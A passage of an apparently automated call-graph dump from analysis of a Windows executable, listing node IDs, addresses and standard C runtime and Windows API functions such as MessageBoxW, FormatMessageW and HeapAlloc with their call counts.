16731->16732 18002 7ff7ead15f94 16732->18002 16735 7ff7ead0c550 _log10_special 8 API calls 16736 7ff7ead0392b 16735->16736 16736->16389 16737 7ff7ead07f90 16736->16737 16738 7ff7ead07fb4 16737->16738 16739 7ff7ead0808b __vcrt_freefls 16738->16739 16740 7ff7ead106d4 73 API calls 16738->16740 16739->16394 16741 7ff7ead07fd0 16740->16741 16741->16739 18394 7ff7ead178c8 16741->18394 16743 7ff7ead07fe5 16743->16739 16744 7ff7ead106d4 73 API calls 16743->16744 16745 7ff7ead1039c _fread_nolock 53 API calls 16743->16745 16744->16743 16745->16743 16747 7ff7ead1007c 16746->16747 18409 7ff7ead0fe28 16747->18409 16749 7ff7ead10095 16749->16389 16751 7ff7ead0c850 16750->16751 16752 7ff7ead02734 GetCurrentProcessId 16751->16752 16753 7ff7ead01c80 49 API calls 16752->16753 16754 7ff7ead02787 16753->16754 16755 7ff7ead14984 49 API calls 16754->16755 16756 7ff7ead027cf 16755->16756 16757 7ff7ead02620 12 API calls 16756->16757 16758 7ff7ead027f1 16757->16758 16759 7ff7ead0c550 _log10_special 8 API calls 16758->16759 16760 7ff7ead02801 16759->16760 16760->16378 16762 7ff7ead09390 2 API calls 16761->16762 16763 7ff7ead0895c 16762->16763 16764 7ff7ead09390 2 API calls 16763->16764 16765 7ff7ead0896c 16764->16765 16766 7ff7ead18238 38 API calls 16765->16766 16767 7ff7ead0897a __vcrt_freefls 16766->16767 16767->16404 16769 7ff7ead01c80 49 API calls 16768->16769 16770 7ff7ead044fd 16769->16770 16770->16432 16772 7ff7ead01c80 49 API calls 16771->16772 16773 7ff7ead04660 16772->16773 16773->16449 16775 7ff7ead06dd5 16774->16775 16776 7ff7ead03e6c 16775->16776 16777 7ff7ead14f08 _set_fmode 11 API calls 16775->16777 16780 7ff7ead07340 16776->16780 16778 7ff7ead06de2 16777->16778 16779 7ff7ead02910 54 API calls 16778->16779 16779->16776 18420 7ff7ead01470 16780->18420 18526 7ff7ead06360 16848->18526 16868 7ff7ead1546c EnterCriticalSection 16861->16868 16870 7ff7ead036bc GetModuleFileNameW 16869->16870 16870->16561 16870->16562 16872 7ff7ead092bf FindClose 16871->16872 16873 7ff7ead092d2 16871->16873 16872->16873 16874 7ff7ead0c550 _log10_special 8 API calls 16873->16874 16875 7ff7ead0371a 16874->16875 16875->16567 16875->16568 16877 7ff7ead0c850 16876->16877 16878 7ff7ead02c70 GetCurrentProcessId 16877->16878 16907 7ff7ead026b0 16878->16907 16880 7ff7ead02cb9 16911 7ff7ead14bd8 16880->16911 16883 7ff7ead026b0 48 API calls 16884 7ff7ead02d34 FormatMessageW 16883->16884 16886 7ff7ead02d7f MessageBoxW 16884->16886 16887 7ff7ead02d6d 16884->16887 16889 7ff7ead0c550 _log10_special 8 API calls 16886->16889 16888 7ff7ead026b0 48 API calls 16887->16888 16888->16886 16890 7ff7ead02daf 16889->16890 16890->16565 16892 7ff7ead03730 16891->16892 16893 7ff7ead09340 GetFinalPathNameByHandleW CloseHandle 16891->16893 16892->16575 16892->16576 16893->16892 16895 7ff7ead02834 16894->16895 16896 7ff7ead026b0 48 API calls 16895->16896 16897 7ff7ead02887 16896->16897 16898 7ff7ead14bd8 48 API calls 16897->16898 16899 7ff7ead028d0 MessageBoxW 16898->16899 16900 7ff7ead0c550 _log10_special 8 API calls 16899->16900 16901 7ff7ead02900 16900->16901 16901->16565 16903 7ff7ead0946a WideCharToMultiByte 16902->16903 16904 7ff7ead09495 16902->16904 16903->16904 16906 7ff7ead094ab __vcrt_freefls 16903->16906 16905 7ff7ead094b2 WideCharToMultiByte 16904->16905 16904->16906 16905->16906 16906->16572 16908 7ff7ead026d5 16907->16908 16909 7ff7ead14bd8 48 API calls 16908->16909 16910 7ff7ead026f8 16909->16910 16910->16880 16914 7ff7ead14c32 16911->16914 16912 7ff7ead14c57 16913 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 16912->16913 16917 7ff7ead14c81 16913->16917 16914->16912 16915 7ff7ead14c93 16914->16915 16929 7ff7ead12f90 16915->16929 16919 7ff7ead0c550 _log10_special 8 API calls 16917->16919 16918 7ff7ead14d40 16926 7ff7ead14d74 16918->16926 16928 7ff7ead14d49 16918->16928 16922 7ff7ead02d04 16919->16922 16920 7ff7ead1a948 __free_lconv_num 11 API calls 16920->16917 16922->16883 16923 7ff7ead14d9a 16924 7ff7ead14da4 16923->16924 16923->16926 16927 7ff7ead1a948 __free_lconv_num 11 API calls 16924->16927 16925 7ff7ead1a948 __free_lconv_num 11 API calls 16925->16917 16926->16920 16927->16917 16928->16925 16930 7ff7ead12fce 16929->16930 16935 7ff7ead12fbe 16929->16935 16931 7ff7ead12fd7 16930->16931 16938 7ff7ead13005 16930->16938 16933 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 16931->16933 16932 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 16934 7ff7ead12ffd 16932->16934 16933->16934 16934->16918 16934->16923 16934->16926 16934->16928 16935->16932 16938->16934 16938->16935 16940 7ff7ead139a4 16938->16940 16973 7ff7ead133f0 16938->16973 17010 7ff7ead12b80 16938->17010 16941 7ff7ead13a57 16940->16941 16942 7ff7ead139e6 16940->16942 16943 7ff7ead13a5c 16941->16943 16944 7ff7ead13ab0 16941->16944 16945 7ff7ead139ec 16942->16945 16946 7ff7ead13a81 16942->16946 16947 7ff7ead13a5e 16943->16947 16948 7ff7ead13a91 16943->16948 16951 7ff7ead13ac7 16944->16951 16953 7ff7ead13aba 16944->16953 16958 7ff7ead13abf 16944->16958 16949 7ff7ead13a20 16945->16949 16950 7ff7ead139f1 16945->16950 17033 7ff7ead11d54 16946->17033 16952 7ff7ead13a00 16947->16952 16962 7ff7ead13a6d 16947->16962 17040 7ff7ead11944 16948->17040 16954 7ff7ead139f7 16949->16954 16949->16958 16950->16951 16950->16954 17047 7ff7ead146ac 16951->17047 16971 7ff7ead13af0 16952->16971 17013 7ff7ead14158 16952->17013 16953->16946 16953->16958 16954->16952 16961 7ff7ead13a32 16954->16961 16969 7ff7ead13a1b 16954->16969 16958->16971 17051 7ff7ead12164 16958->17051 16961->16971 17023 7ff7ead14494 16961->17023 16962->16946 16963 7ff7ead13a72 16962->16963 16963->16971 17029 7ff7ead14558 16963->17029 16965 7ff7ead0c550 _log10_special 8 API calls 16966 7ff7ead13dea 16965->16966 16966->16938 16969->16971 16972 7ff7ead13cdc 16969->16972 17058 7ff7ead147c0 16969->17058 16971->16965 16972->16971 17064 7ff7ead1ea08 16972->17064 16974 7ff7ead133fe 16973->16974 16975 7ff7ead13414 16973->16975 16977 7ff7ead13a57 16974->16977 16978 7ff7ead139e6 16974->16978 16979 7ff7ead13454 16974->16979 16976 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 16975->16976 16975->16979 16976->16979 16980 7ff7ead13a5c 16977->16980 16981 7ff7ead13ab0 16977->16981 16982 7ff7ead139ec 16978->16982 16983 7ff7ead13a81 16978->16983 16979->16938 16984 7ff7ead13a5e 16980->16984 16985 7ff7ead13a91 16980->16985 16988 7ff7ead13ac7 16981->16988 16990 7ff7ead13aba 16981->16990 16995 7ff7ead13abf 16981->16995 16986 7ff7ead13a20 16982->16986 16987 7ff7ead139f1 16982->16987 16992 7ff7ead11d54 38 API calls 16983->16992 16989 7ff7ead13a00 16984->16989 16998 7ff7ead13a6d 16984->16998 16993 7ff7ead11944 38 API calls 16985->16993 16991 7ff7ead139f7 16986->16991 16986->16995 16987->16988 16987->16991 16996 7ff7ead146ac 45 API calls 16988->16996 16994 7ff7ead14158 47 API calls 16989->16994 17008 7ff7ead13af0 16989->17008 16990->16983 16990->16995 16991->16989 16999 7ff7ead13a32 16991->16999 17005 7ff7ead13a1b 16991->17005 16992->17005 16993->17005 16994->17005 16997 7ff7ead12164 38 API calls 16995->16997 16995->17008 16996->17005 16997->17005 16998->16983 17000 7ff7ead13a72 16998->17000 17001 7ff7ead14494 46 API calls 16999->17001 16999->17008 17003 7ff7ead14558 37 API calls 17000->17003 17000->17008 17001->17005 17002 7ff7ead0c550 _log10_special 8 API calls 17004 7ff7ead13dea 17002->17004 17003->17005 17004->16938 17006 7ff7ead147c0 45 API calls 17005->17006 17005->17008 17009 7ff7ead13cdc 17005->17009 17006->17009 17007 7ff7ead1ea08 46 API calls 17007->17009 17008->17002 17009->17007 17009->17008 17249 7ff7ead10fc8 17010->17249 17014 7ff7ead1417e 17013->17014 17076 7ff7ead10b80 17014->17076 17018 7ff7ead14351 17018->16969 17019 7ff7ead142c3 17019->17018 17022 7ff7ead147c0 45 API calls 17019->17022 17021 7ff7ead147c0 45 API calls 17021->17019 17022->17018 17025 7ff7ead144c9 17023->17025 17024 7ff7ead144e7 17027 7ff7ead1ea08 46 API calls 17024->17027 17025->17024 17026 7ff7ead147c0 45 API calls 17025->17026 17028 7ff7ead1450e 17025->17028 17026->17024 17027->17028 17028->16969 17032 7ff7ead14579 17029->17032 17030 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17031 7ff7ead145aa 17030->17031 17031->16969 17032->17030 17032->17031 17034 7ff7ead11d87 17033->17034 17035 7ff7ead11db6 17034->17035 17037 7ff7ead11e73 17034->17037 17039 7ff7ead11df3 17035->17039 17219 7ff7ead10c28 17035->17219 17038 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17037->17038 17038->17039 17039->16969 17041 7ff7ead11977 17040->17041 17042 7ff7ead119a6 17041->17042 17044 7ff7ead11a63 17041->17044 17043 7ff7ead10c28 12 API calls 17042->17043 17046 7ff7ead119e3 17042->17046 17043->17046 17045 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17044->17045 17045->17046 17046->16969 17048 7ff7ead146ef 17047->17048 17050 7ff7ead146f3 __crtLCMapStringW 17048->17050 17227 7ff7ead14748 17048->17227 17050->16969 17053 7ff7ead12197 17051->17053 17052 7ff7ead121c6 17054 7ff7ead10c28 12 API calls 17052->17054 17057 7ff7ead12203 17052->17057 17053->17052 17055 7ff7ead12283 17053->17055 17054->17057 17056 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17055->17056 17056->17057 17057->16969 17059 7ff7ead147d7 17058->17059 17231 7ff7ead1d9b8 17059->17231 17066 7ff7ead1ea39 17064->17066 17074 7ff7ead1ea47 17064->17074 17065 7ff7ead1ea67 17068 7ff7ead1ea78 17065->17068 17070 7ff7ead1ea9f 17065->17070 17066->17065 17067 7ff7ead147c0 45 API calls 17066->17067 17066->17074 17067->17065 17239 7ff7ead200a0 17068->17239 17071 7ff7ead1eb2a 17070->17071 17072 7ff7ead1eac9 17070->17072 17070->17074 17073 7ff7ead1f8a0 _fread_nolock MultiByteToWideChar 17071->17073 17072->17074 17242 7ff7ead1f8a0 17072->17242 17073->17074 17074->16972 17077 7ff7ead10ba6 17076->17077 17078 7ff7ead10bb7 17076->17078 17084 7ff7ead1e570 17077->17084 17078->17077 17106 7ff7ead1d5fc 17078->17106 17081 7ff7ead10bf8 17083 7ff7ead1a948 __free_lconv_num 11 API calls 17081->17083 17082 7ff7ead1a948 __free_lconv_num 11 API calls 17082->17081 17083->17077 17085 7ff7ead1e58d 17084->17085 17086 7ff7ead1e5c0 17084->17086 17087 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17085->17087 17086->17085 17088 7ff7ead1e5f2 17086->17088 17097 7ff7ead142a1 17087->17097 17095 7ff7ead1e705 17088->17095 17101 7ff7ead1e63a 17088->17101 17089 7ff7ead1e7f7 17146 7ff7ead1da5c 17089->17146 17091 7ff7ead1e7bd 17139 7ff7ead1ddf4 17091->17139 17093 7ff7ead1e78c 17132 7ff7ead1e0d4 17093->17132 17095->17089 17095->17091 17095->17093 17096 7ff7ead1e74f 17095->17096 17098 7ff7ead1e745 17095->17098 17122 7ff7ead1e304 17096->17122 17097->17019 17097->17021 17098->17091 17100 7ff7ead1e74a 17098->17100 17100->17093 17100->17096 17101->17097 17113 7ff7ead1a4a4 17101->17113 17104 7ff7ead1a900 _isindst 17 API calls 17105 7ff7ead1e854 17104->17105 17107 7ff7ead1d647 17106->17107 17111 7ff7ead1d60b _set_fmode 17106->17111 17108 7ff7ead14f08 _set_fmode 11 API calls 17107->17108 17110 7ff7ead10be4 17108->17110 17109 7ff7ead1d62e HeapAlloc 17109->17110 17109->17111 17110->17081 17110->17082 17111->17107 17111->17109 17112 7ff7ead23590 _set_fmode 2 API calls 17111->17112 17112->17111 17114 7ff7ead1a4bb 17113->17114 17115 7ff7ead1a4b1 17113->17115 17116 7ff7ead14f08 _set_fmode 11 API calls 17114->17116 17115->17114 17120 7ff7ead1a4d6 17115->17120 17117 7ff7ead1a4c2 17116->17117 17118 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 17117->17118 17119 7ff7ead1a4ce 17118->17119 17119->17097 17119->17104 17120->17119 17121 7ff7ead14f08 _set_fmode 11 API calls 17120->17121 17121->17117 17155 7ff7ead240ac 17122->17155 17126 7ff7ead1e3ac 17127 7ff7ead1e3b0 17126->17127 17128 7ff7ead1e401 17126->17128 17129 7ff7ead1e3cc 17126->17129 17127->17097 17208 7ff7ead1def0 17128->17208 17204 7ff7ead1e1ac 17129->17204 17133 7ff7ead240ac 38 API calls 17132->17133 17134 7ff7ead1e11e 17133->17134 17135 7ff7ead23af4 37 API calls 17134->17135 17136 7ff7ead1e16e 17135->17136 17137 7ff7ead1e172 17136->17137 17138 7ff7ead1e1ac 45 API calls 17136->17138 17137->17097 17138->17137 17140 7ff7ead240ac 38 API calls 17139->17140 17141 7ff7ead1de3f 17140->17141 17142 7ff7ead23af4 37 API calls 17141->17142 17143 7ff7ead1de97 17142->17143 17144 7ff7ead1de9b 17143->17144 17145 7ff7ead1def0 45 API calls 17143->17145 17144->17097 17145->17144 17147 7ff7ead1daa1 17146->17147 17148 7ff7ead1dad4 17146->17148 17149 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17147->17149 17150 7ff7ead1daec 17148->17150 17153 7ff7ead1db6d 17148->17153 17152 7ff7ead1dacd __scrt_get_show_window_mode 17149->17152 17151 7ff7ead1ddf4 46 API calls 17150->17151 17151->17152 17152->17097 17153->17152 17154 7ff7ead147c0 45 API calls 17153->17154 17154->17152 17156 7ff7ead240ff fegetenv 17155->17156 17157 7ff7ead27e2c 37 API calls 17156->17157 17162 7ff7ead24152 17157->17162 17158 7ff7ead2417f 17161 7ff7ead1a4a4 __std_exception_copy 37 API calls 17158->17161 17159 7ff7ead24242 17160 7ff7ead27e2c 37 API calls 17159->17160 17163 7ff7ead2426c 17160->17163 17164 7ff7ead241fd 17161->17164 17162->17159 17165 7ff7ead2416d 17162->17165 17166 7ff7ead2421c 17162->17166 17167 7ff7ead27e2c 37 API calls 17163->17167 17169 7ff7ead25324 17164->17169 17174 7ff7ead24205 17164->17174 17165->17158 17165->17159 17170 7ff7ead1a4a4 __std_exception_copy 37 API calls 17166->17170 17168 7ff7ead2427d 17167->17168 17171 7ff7ead28020 20 API calls 17168->17171 17172 7ff7ead1a900 _isindst 17 API calls 17169->17172 17170->17164 17182 7ff7ead242e6 __scrt_get_show_window_mode 17171->17182 17173 7ff7ead25339 17172->17173 17175 7ff7ead0c550 _log10_special 8 API calls 17174->17175 17176 7ff7ead1e351 17175->17176 17200 7ff7ead23af4 17176->17200 17177 7ff7ead2468f __scrt_get_show_window_mode 17178 7ff7ead24327 memcpy_s 17193 7ff7ead24783 memcpy_s __scrt_get_show_window_mode 17178->17193 17195 7ff7ead24c6b memcpy_s __scrt_get_show_window_mode 17178->17195 17179 7ff7ead249cf 17180 7ff7ead23c10 37 API calls 17179->17180 17184 7ff7ead250e7 17180->17184 17181 7ff7ead2497b 17181->17179 17181->17181 17183 7ff7ead2533c memcpy_s 37 API calls 17181->17183 17182->17177 17182->17178 17185 7ff7ead14f08 _set_fmode 11 API calls 17182->17185 17183->17179 17184->17184 17189 7ff7ead2533c memcpy_s 37 API calls 17184->17189 17199 7ff7ead25142 17184->17199 17186 7ff7ead24760 17185->17186 17188 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 17186->17188 17187 7ff7ead252c8 17191 7ff7ead27e2c 37 API calls 17187->17191 17188->17178 17189->17199 17190 7ff7ead14f08 11 API calls _set_fmode 17190->17193 17191->17174 17192 7ff7ead14f08 11 API calls _set_fmode 17192->17195 17193->17181 17193->17190 17196 7ff7ead1a8e0 37 API calls _invalid_parameter_noinfo 17193->17196 17194 7ff7ead23c10 37 API calls 17194->17199 17195->17179 17195->17181 17195->17192 17198 7ff7ead1a8e0 37 API calls _invalid_parameter_noinfo 17195->17198 17196->17193 17197 7ff7ead2533c memcpy_s 37 API calls 17197->17199 17198->17195 17199->17187 17199->17194 17199->17197 17201 7ff7ead23b13 17200->17201 17202 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17201->17202 17203 7ff7ead23b3e memcpy_s 17201->17203 17202->17203 17203->17126 17205 7ff7ead1e1d8 memcpy_s 17204->17205 17206 7ff7ead147c0 45 API calls 17205->17206 17207 7ff7ead1e292 memcpy_s __scrt_get_show_window_mode 17205->17207 17206->17207 17207->17127 17209 7ff7ead1df2b 17208->17209 17212 7ff7ead1df78 memcpy_s 17208->17212 17210 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17209->17210 17211 7ff7ead1df57 17210->17211 17211->17127 17213 7ff7ead1dfe3 17212->17213 17215 7ff7ead147c0 45 API calls 17212->17215 17214 7ff7ead1a4a4 __std_exception_copy 37 API calls 17213->17214 17218 7ff7ead1e025 memcpy_s 17214->17218 17215->17213 17216 7ff7ead1a900 _isindst 17 API calls 17217 7ff7ead1e0d0 17216->17217 17218->17216 17220 7ff7ead10c5f 17219->17220 17226 7ff7ead10c4e 17219->17226 17221 7ff7ead1d5fc _fread_nolock 12 API calls 17220->17221 17220->17226 17222 7ff7ead10c90 17221->17222 17223 7ff7ead10ca4 17222->17223 17224 7ff7ead1a948 __free_lconv_num 11 API calls 17222->17224 17225 7ff7ead1a948 __free_lconv_num 11 API calls 17223->17225 17224->17223 17225->17226 17226->17039 17228 7ff7ead1476e 17227->17228 17229 7ff7ead14766 17227->17229 17228->17050 17230 7ff7ead147c0 45 API calls 17229->17230 17230->17228 17232 7ff7ead1d9d1 17231->17232 17234 7ff7ead147ff 17231->17234 17233 7ff7ead23304 45 API calls 17232->17233 17232->17234 17233->17234 17235 7ff7ead1da24 17234->17235 17236 7ff7ead1da3d 17235->17236 17238 7ff7ead1480f 17235->17238 17237 7ff7ead22650 45 API calls 17236->17237 17236->17238 17237->17238 17238->16972 17245 7ff7ead26d88 17239->17245 17244 7ff7ead1f8a9 MultiByteToWideChar 17242->17244 17247 7ff7ead26dec 17245->17247 17246 7ff7ead0c550 _log10_special 8 API calls 17248 7ff7ead200bd 17246->17248 17247->17246 17248->17074 17250 7ff7ead10ffd 17249->17250 17251 7ff7ead1100f 17249->17251 17252 7ff7ead14f08 _set_fmode 11 API calls 17250->17252 17254 7ff7ead1101d 17251->17254 17257 7ff7ead11059 17251->17257 17253 7ff7ead11002 17252->17253 17255 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 17253->17255 17256 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17254->17256 17265 7ff7ead1100d 17255->17265 17256->17265 17258 7ff7ead113d5 17257->17258 17260 7ff7ead14f08 _set_fmode 11 API calls 17257->17260 17259 7ff7ead14f08 _set_fmode 11 API calls 17258->17259 17258->17265 17261 7ff7ead11669 17259->17261 17262 7ff7ead113ca 17260->17262 17263 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 17261->17263 17264 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 17262->17264 17263->17265 17264->17258 17265->16938 17267 7ff7ead10704 17266->17267 17294 7ff7ead10464 17267->17294 17269 7ff7ead1071d 17269->16590 17306 7ff7ead103bc 17270->17306 17274 7ff7ead0c850 17273->17274 17275 7ff7ead02930 GetCurrentProcessId 17274->17275 17276 7ff7ead01c80 49 API calls 17275->17276 17277 7ff7ead02979 17276->17277 17320 7ff7ead14984 17277->17320 17282 7ff7ead01c80 49 API calls 17283 7ff7ead029ff 17282->17283 17350 7ff7ead02620 17283->17350 17286 7ff7ead0c550 _log10_special 8 API calls 17287 7ff7ead02a31 17286->17287 17287->16629 17289 7ff7ead10119 17288->17289 17290 7ff7ead01b89 17288->17290 17291 7ff7ead14f08 _set_fmode 11 API calls 17289->17291 17290->16628 17290->16629 17292 7ff7ead1011e 17291->17292 17293 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 17292->17293 17293->17290 17295 7ff7ead104ce 17294->17295 17296 7ff7ead1048e 17294->17296 17295->17296 17297 7ff7ead104da 17295->17297 17298 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17296->17298 17305 7ff7ead1546c EnterCriticalSection 17297->17305 17300 7ff7ead104b5 17298->17300 17300->17269 17307 7ff7ead103e6 17306->17307 17308 7ff7ead01a20 17306->17308 17307->17308 17309 7ff7ead10432 17307->17309 17310 7ff7ead103f5 __scrt_get_show_window_mode 17307->17310 17308->16598 17308->16599 17319 7ff7ead1546c EnterCriticalSection 17309->17319 17312 7ff7ead14f08 _set_fmode 11 API calls 17310->17312 17314 7ff7ead1040a 17312->17314 17317 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 17314->17317 17317->17308 17322 7ff7ead149de 17320->17322 17321 7ff7ead14a03 17323 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17321->17323 17322->17321 17324 7ff7ead14a3f 17322->17324 17337 7ff7ead14a2d 17323->17337 17359 7ff7ead12c10 17324->17359 17326 7ff7ead14b1c 17329 7ff7ead1a948 __free_lconv_num 11 API calls 17326->17329 17328 7ff7ead0c550 _log10_special 8 API calls 17330 7ff7ead029c3 17328->17330 17329->17337 17338 7ff7ead15160 17330->17338 17331 7ff7ead14b40 17331->17326 17333 7ff7ead14b4a 17331->17333 17332 7ff7ead14af1 17334 7ff7ead1a948 __free_lconv_num 11 API calls 17332->17334 17336 7ff7ead1a948 __free_lconv_num 11 API calls 17333->17336 17334->17337 17335 7ff7ead14ae8 17335->17326 17335->17332 17336->17337 17337->17328 17339 7ff7ead1b2c8 _set_fmode 11 API calls 17338->17339 17340 7ff7ead15177 17339->17340 17341 7ff7ead1eb98 _set_fmode 11 API calls 17340->17341 17342 7ff7ead151b7 17340->17342 17347 7ff7ead029e5 17340->17347 17343 7ff7ead151ac 17341->17343 17342->17347 17497 7ff7ead1ec20 17342->17497 17344 7ff7ead1a948 __free_lconv_num 11 API calls 17343->17344 17344->17342 17347->17282 17348 7ff7ead1a900 _isindst 17 API calls 17349 7ff7ead151fc 17348->17349 17351 7ff7ead0262f 17350->17351 17352 7ff7ead09390 2 API calls 17351->17352 17353 7ff7ead02660 17352->17353 17354 7ff7ead02683 MessageBoxA 17353->17354 17355 7ff7ead0266f MessageBoxW 17353->17355 17356 7ff7ead02690 17354->17356 17355->17356 17357 7ff7ead0c550 _log10_special 8 API calls 17356->17357 17358 7ff7ead026a0 17357->17358 17358->17286 17360 7ff7ead12c4e 17359->17360 17361 7ff7ead12c3e 17359->17361 17362 7ff7ead12c57 17360->17362 17363 7ff7ead12c85 17360->17363 17364 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17361->17364 17365 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17362->17365 17363->17361 17366 7ff7ead12c7d 17363->17366 17367 7ff7ead147c0 45 API calls 17363->17367 17369 7ff7ead12f34 17363->17369 17373 7ff7ead135a0 17363->17373 17399 7ff7ead13268 17363->17399 17429 7ff7ead12af0 17363->17429 17364->17366 17365->17366 17366->17326 17366->17331 17366->17332 17366->17335 17367->17363 17371 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17369->17371 17371->17361 17374 7ff7ead135e2 17373->17374 17375 7ff7ead13655 17373->17375 17376 7ff7ead135e8 17374->17376 17377 7ff7ead1367f 17374->17377 17378 7ff7ead1365a 17375->17378 17379 7ff7ead136af 17375->17379 17385 7ff7ead135ed 17376->17385 17388 7ff7ead136be 17376->17388 17446 7ff7ead11b50 17377->17446 17380 7ff7ead1365c 17378->17380 17381 7ff7ead1368f 17378->17381 17379->17377 17379->17388 17397 7ff7ead13618 17379->17397 17383 7ff7ead135fd 17380->17383 17387 7ff7ead1366b 17380->17387 17453 7ff7ead11740 17381->17453 17396 7ff7ead136ed 17383->17396 17432 7ff7ead13f04 17383->17432 17385->17383 17389 7ff7ead13630 17385->17389 17385->17397 17387->17377 17391 7ff7ead13670 17387->17391 17388->17396 17460 7ff7ead11f60 17388->17460 17389->17396 17442 7ff7ead143c0 17389->17442 17394 7ff7ead14558 37 API calls 17391->17394 17391->17396 17393 7ff7ead0c550 _log10_special 8 API calls 17395 7ff7ead13983 17393->17395 17394->17397 17395->17363 17396->17393 17397->17396 17467 7ff7ead1e858 17397->17467 17400 7ff7ead13289 17399->17400 17401 7ff7ead13273 17399->17401 17404 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17400->17404 17405 7ff7ead132c7 17400->17405 17402 7ff7ead135e2 17401->17402 17403 7ff7ead13655 17401->17403 17401->17405 17406 7ff7ead135e8 17402->17406 17407 7ff7ead1367f 17402->17407 17408 7ff7ead1365a 17403->17408 17409 7ff7ead136af 17403->17409 17404->17405 17405->17363 17416 7ff7ead135ed 17406->17416 17419 7ff7ead136be 17406->17419 17412 7ff7ead11b50 38 API calls 17407->17412 17410 7ff7ead1365c 17408->17410 17411 7ff7ead1368f 17408->17411 17409->17407 17409->17419 17427 7ff7ead13618 17409->17427 17413 7ff7ead135fd 17410->17413 17417 7ff7ead1366b 17410->17417 17414 7ff7ead11740 38 API calls 17411->17414 17412->17427 17415 7ff7ead13f04 47 API calls 17413->17415 17428 7ff7ead136ed 17413->17428 17414->17427 17415->17427 17416->17413 17418 7ff7ead13630 17416->17418 17416->17427 17417->17407 17421 7ff7ead13670 17417->17421 17422 7ff7ead143c0 47 API calls 17418->17422 17418->17428 17420 7ff7ead11f60 38 API calls 17419->17420 17419->17428 17420->17427 17424 7ff7ead14558 37 API calls 17421->17424 17421->17428 17422->17427 17423 7ff7ead0c550 _log10_special 8 API calls 17425 7ff7ead13983 17423->17425 17424->17427 17425->17363 17426 7ff7ead1e858 47 API calls 17426->17427 17427->17426 17427->17428 17428->17423 17480 7ff7ead10d14 17429->17480 17433 7ff7ead13f26 17432->17433 17434 7ff7ead10b80 12 API calls 17433->17434 17435 7ff7ead13f6e 17434->17435 17436 7ff7ead1e570 46 API calls 17435->17436 17437 7ff7ead14041 17436->17437 17438 7ff7ead147c0 45 API calls 17437->17438 17439 7ff7ead14063 17437->17439 17438->17439 17440 7ff7ead147c0 45 API calls 17439->17440 17441 7ff7ead140ec 17439->17441 17440->17441 17441->17397 17443 7ff7ead143d8 17442->17443 17444 7ff7ead14440 17442->17444 17443->17444 17445 7ff7ead1e858 47 API calls 17443->17445 17444->17397 17445->17444 17447 7ff7ead11b83 17446->17447 17448 7ff7ead11bb2 17447->17448 17450 7ff7ead11c6f 17447->17450 17449 7ff7ead10b80 12 API calls 17448->17449 17452 7ff7ead11bef 17448->17452 17449->17452 17451 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17450->17451 17451->17452 17452->17397 17454 7ff7ead11773 17453->17454 17455 7ff7ead117a2 17454->17455 17458 7ff7ead1185f 17454->17458 17456 7ff7ead117df 17455->17456 17457 7ff7ead10b80 12 API calls 17455->17457 17456->17397 17457->17456 17459 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17458->17459 17459->17456 17461 7ff7ead11f93 17460->17461 17462 7ff7ead11fc2 17461->17462 17464 7ff7ead1207f 17461->17464 17463 7ff7ead10b80 12 API calls 17462->17463 17466 7ff7ead11fff 17462->17466 17463->17466 17465 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17464->17465 17465->17466 17466->17397 17468 7ff7ead1e880 17467->17468 17469 7ff7ead1e8c5 17468->17469 17471 7ff7ead147c0 45 API calls 17468->17471 17473 7ff7ead1e885 __scrt_get_show_window_mode 17468->17473 17476 7ff7ead1e8ae __scrt_get_show_window_mode 17468->17476 17469->17473 17469->17476 17477 7ff7ead207e8 17469->17477 17470 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17470->17473 17471->17469 17473->17397 17476->17470 17476->17473 17479 7ff7ead2080c WideCharToMultiByte 17477->17479 17481 7ff7ead10d41 17480->17481 17482 7ff7ead10d53 17480->17482 17483 7ff7ead14f08 _set_fmode 11 API calls 17481->17483 17484 7ff7ead10d9d 17482->17484 17486 7ff7ead10d60 17482->17486 17485 7ff7ead10d46 17483->17485 17489 7ff7ead10e46 17484->17489 17490 7ff7ead14f08 _set_fmode 11 API calls 17484->17490 17487 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 17485->17487 17488 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17486->17488 17494 7ff7ead10d51 17487->17494 17488->17494 17491 7ff7ead14f08 _set_fmode 11 API calls 17489->17491 17489->17494 17492 7ff7ead10e3b 17490->17492 17493 7ff7ead10ef0 17491->17493 17495 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 17492->17495 17496 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 17493->17496 17494->17363 17495->17489 17496->17494 17501 7ff7ead1ec3d 17497->17501 17498 7ff7ead1ec42 17499 7ff7ead151dd 17498->17499 17500 7ff7ead14f08 _set_fmode 11 API calls 17498->17500 17499->17347 17499->17348 17502 7ff7ead1ec4c 17500->17502 17501->17498 17501->17499 17504 7ff7ead1ec8c 17501->17504 17503 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 17502->17503 17503->17499 17504->17499 17505 7ff7ead14f08 